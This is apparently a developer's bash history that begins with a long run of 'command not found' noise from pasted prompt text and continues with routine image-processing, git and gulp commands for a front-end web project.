+[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +de]bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ sh: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: sh:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110c-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110a-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ alador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: alador@gatanda:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash:bash: [CHG]: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: da: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.dehhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goaladornd +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not ffound +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.dehhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goaladornd +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not ffound +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goal +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ da hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 0000110b-0000-1000-8000-00805f9b34fb +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: comm[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: comm[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bower install --save swiper.js +bower install --save swiper +bluetoothctl +ping google.de +ping google.de +ping google.de +ls +ls -hal +convert -geometry 400x PlainBoule.png +convert -geometry 400x PlainBoule.png PlainBoule-Teams.png +ls -hal +convert -geometry 400x PlainBoule-Anmelden.png PlainBoule-signup.png +convert -geometry 400x PlainBoule-Modus.png PlainBoule-Mode.png +ssh rius@eltanin.uberspace.de +bluetoothctl +convert -geometry 600x BCSP-Kugeln_und_Sau.jpg BCSP-Kugeln_und_Sau.jpg +killall chromium +convert -geometry 600x planetarium.jpg planetarium.jpg +ls +ls +convert -geometry 600x eaters-collective-197218.jpg eaters-collective-197218.jpg +convert -geometry 600x picseli-6725.jpg picseli-6725.jpg +ls +ls +ls +ls -all +gthumb DSC06409.JPG +mv DSC06409.JPG Lageplan.jpg +mv DSC06410.JPG LeckerLecker.jpg +convert -geometry 1200x Lageplan.jpg Lageplan.jpg +convert -geometry 1200x LeckerLecker.jpg LeckerLecker.jpg +ls +mmv +sudo pacman -S mmv +pacsearch mmv +rename 'y/A-Z/a-z/' * +ls +rename 'y/A-Z/a-z/0-9/' * +ls +man rename +man rename +man rename +rename 's/\.JPG$//' *.jpg +rename 's/\.JPG$/.jpg/g' *.JPG +ls +rename 's/\.JPG$/\.jpg/g' *.JPG +ls +cp -r AmTag/ AmTagBak +ls +j=1;for i in *.JPG; do mv "$i" file"$j".jpg; let j=j+1;done +ls +j=1;for i in *.JPG; do printf -v new "$i%02d" "$((++j))"; mv -v -- "$i" "$new"; done +j=1;for i in *.jpg; do printf -v new "$i%02d" "$((++j))"; mv -v -- "$i" "$new"; done +ls +j=1;for i in *.jpg; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" "$new"; done +j=1;for i in *.JPG; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" "$new"; done +j=1;for i in *; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" 2-hh-neuaufnahme-"$new"; done +j=1;for i in *; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" 2-hh-neuaufnahme-"$new.jpg"; done +ls +j=0;for i in *.jpg; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" 2-hh-neuaufnahme-"$new"; done +ls +j=0;for i in *; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" 2-hh-neuaufnahme-"$new".jpg; done +ls +morgify -size 800x -format jpg *.jpg +mogrify -size 800x -format jpg *.jpg +ls -all +ls -hall +convert -geometry 800x *.jpg *.jpg +ls +ls -all +ls -hall +mogrify -resize 800x -format jpg *.jpg +ls -hal +find . -name '*.jpg' | while read f; do convert "$f" -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls +ls -hal +j=1;for i in *; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" 2-hh-neuaufnahme-"$new.jpg"; done +j=0;for i in *; do printf -v new "%02d" "$((++j))"; mv -v -- "$i" 2-hh-neuaufnahme-"$new.jpg"; done +ls -hal +git add . +git commit -m 'just gone live, removing the menu from the startpage.' +#cp -r hhneuauf.de hhneuauf.de-bak3-live +git add . +git commit -m 'little fixes und berichte' +cp -r hhneuauf.de hhneuauf.de-bak3-live +chromium --allow-file-access-from-files +chromium --allow-file-access-from-files +ls +ls GitHub/ +ls +mkdir DPS +ls +git clone git@git.interone.de:interone-hamburg/dp-s.git +chmod 775 ~/.ssh/dps +git clone git@git.interone.de:interone-hamburg/dp-s.git +chmod 755 ~/.ssh/dps +git clone git@git.interone.de:interone-hamburg/dp-s.git +chmod 700 ~/.ssh/dps +git clone git@git.interone.de:interone-hamburg/dp-s.git +ls +ls +git status +git checkout develop +ls +gulp watch +npm install +ls +git checkout master +git pull +git checkout develop +git pull +git pull +gulp watch +git branch --list +git checkout master +gulp watch +git pull +gulp watch +git checkout -b feature-search-info-tooltip +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +git status +git add . +git commit -m 'adding info-tooltip, including position bottom when not enough space above and a special mobile overlay view down to 320px width' +git checkout master +git pull +git rebase master feature-search-info-tooltip +git branch --list +git checkout master +git merge feature-search-info-tooltip --no-ff +git push +git checkout -b page-publication-details +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +git status +git add . +git commt -m 'main setup for publications, creating a generic box-list, smaller bugfixes' +git commit -m 'main setup for publications, creating a generic box-list, putting publications filter in a proper form wrapper' +git checkout master +git pull +gulp watch +gulp watch +git status +git add . +git commit -m 'making element-tooltip generic, refactoring css classes an file' +git pull +git push +git branch --list +git checkout page-publication-details +git status +gulp wach +gulp watch +git rebase master page-publication-details +git status +git add . +git rebase --continu +git rebase --continue +git status +gulp watch +gulp watch +git status +git add . +git commit -m 'updating the tooltip, adding expandable to publications detail page giving tooltip the ability to be shown on the left side of the screen, allowing a simplyfied version of the expandable module +git commit -m 'updating the tooltip, adding expandable to publications detail page +giving tooltip the ability to be shown on the left side of the screen +allowing a simplyfied version of the expandable module +making the expandable only visible on mobile through CSS +the expandable adjustments should somehow be a more general feature' +git log +git status +gulp watch +git commit -m 'more mobile adjustments for publications detail page, hiding image, making title smaller, adding paddings' +git add . +git commit -m 'more mobile adjustments for publications detail page, hiding image, making title smaller, adding paddings' +gulp watch +git status +git add . +git commit -m 'adding socialbar to publications detail page' +git checkout master +git pull +git rebase master page-publication-details +git checkout master +git merge page-publication-details --no-ff +git push +gulp watch +git status +git add . +git commit -m 'Page: iza-publications-detail' -m 'adjusting columns to look better on different screen sizes' +git pull +git push +gulp watc +gulp watch +git status +git checkout -- app/modular/templates/modules/module-publications-detail.html +gulp watch +git add . +git commit -m 'Page: iza-publications-detail 2 xl-screen' -m 'showing socialbar in a separate col-xl-2 to not be pushing the other content down' +git pull +git push +gulp watch +git add . +git commit -m 'tooltip-link: making sure it stays always black after click' +git pull +git push +git status +bluetoothctl +grep -R '.53' . +grep -R 'calc(100vw * .53);' . +grep -R '100vw * .53' . +git status +git add . +git commit -m 'improving header look for briq-people' +git status +git push +git status +git status +#git checkout -b anchor-nav-briq +git checkout develop +git pull +git checkout -b anchor-nav-briq +git status +git add . +#git commit -m 'making the alphabet-scroller generally available as the horizontal slider by using to specific classes' +git add . +git commit -m 'HTML changes refactoring the alphabet scoller' -m 'making the alphabet-scroller generically available as the horizontal slider by using to specific classes: horizonzal-slider-wrapper and horizontal-slider-parent. See element-fellows-search.html' +git status +git checkout develop +git status +git pull +git checkout anchor-nav-briq +git status +#git merge --no-ff +git checkout develop +git pull +git merge anchor-nav-briq --no-ff +git status +git push +git rebase develop briq-header-integration +git branch --list +git status +git add . +git commit -m 'working on the generic anchor navigation, with no fixed values. Calculation still a little of but getting close.' +git push +git status +git pull +git status +git add . +git status +git commit -m 'using new briq anchor navigation' +git status +git push +yaourt calculator +calc +git status +git add . +git commit -m 'adjusting the generic briq anchor slider calculation values to be more presize when sliding' +git add . +git commit -m 'gulp wasn't compiling using a new value which needs to be tested on different screen-sizes'' +git commit -m 'gulp wasnt compiling using a new value which needs to be tested on different screen-sizes' +git push +git status +git commit -m 'horizontal-slider updates' +git add . +git commit -m 'horizontal-slider updates' +git push +git checkout -b general-publications-and-filter-modules +git checkout master +git branch -d general-publications-and-filter-modules +git checkout -b general-form-group-radio +gulp watch +git status +git add . +git commit -m 